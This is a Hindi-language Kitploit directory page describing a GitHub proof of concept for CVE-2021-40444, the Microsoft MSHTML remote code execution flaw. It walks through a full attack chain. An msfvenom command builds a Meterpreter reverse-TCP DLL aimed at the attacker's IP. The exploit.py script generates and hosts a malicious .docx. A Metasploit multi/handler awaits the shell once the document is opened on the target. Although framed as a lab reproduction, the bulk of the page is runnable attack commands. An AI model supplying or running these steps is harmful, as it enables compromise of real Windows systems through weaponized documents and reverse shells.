Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/kagura-maru/cve-2021-40444-poc
शोषण फ्रेमवर्कपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubkagura-maru/cve-2021-40444-poc

CVE-2021-40444-POC

Microsoft MSHTML रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता को पुनरुत्पादित करने का एक प्रयास और Metasploit Framework का उपयोग करना।

रिपॉजिटरी देखें
101124 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-40444-POC

मेटास्प्लॉइट फ्रेमवर्क का उपयोग करके Microsoft MSHTML रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता को पुन: उत्पन्न करने का एक प्रयास।

यदि FlareVM में नहीं चलाया जाए तो सबसे अच्छा काम करता है

तैयारी

रिपॉजिटरी को https://github.com/lockedbyte/CVE-2021-40444 से क्लोन करें

बाद में msfvenom के साथ उपयोग के लिए .dll टेम्पलेट तैयार करें

msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll

हाल ही में बनाए गए template.dll को रिपॉजिटरी के test/ फ़ोल्डर में कॉपी करें template.dll को chmod +x template.dll द्वारा निष्पादन योग्य अनुमति दें

स्क्रिप्ट चलाएँ ताकि template.dll को output में प्रोसेस किया जा सके python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>

लिसनर

फिर दस्तावेज़ out/ फ़ोल्डर में निर्यात किया जाएगा और हम अपने HTTP पोर्ट (डिफ़ॉल्ट 80 है) पर एक लिसनर बना सकते हैं python3 exploit.py host 80

मेटास्प्लॉइट को इसके साथ चलाएँ msfconsole -q use multi/handler set payload windows/meterpreter/reverse_tcp set lhost <SOURCE IP> run

पेलोड

फिर हम document.docx को अपनी असुरक्षित मशीन पर भेज सकते हैं और .docx को निष्पादित कर सकते हैं

हमें exploit.py टर्मिनल में प्रतिक्रिया मिलेगी और यदि हम रिवर्स टीसीपी शेल उत्पन्न (स्पॉन) करने में सक्षम होते हैं, तो लैब सफल मानी जाती है।

टूल डाउनलोड करें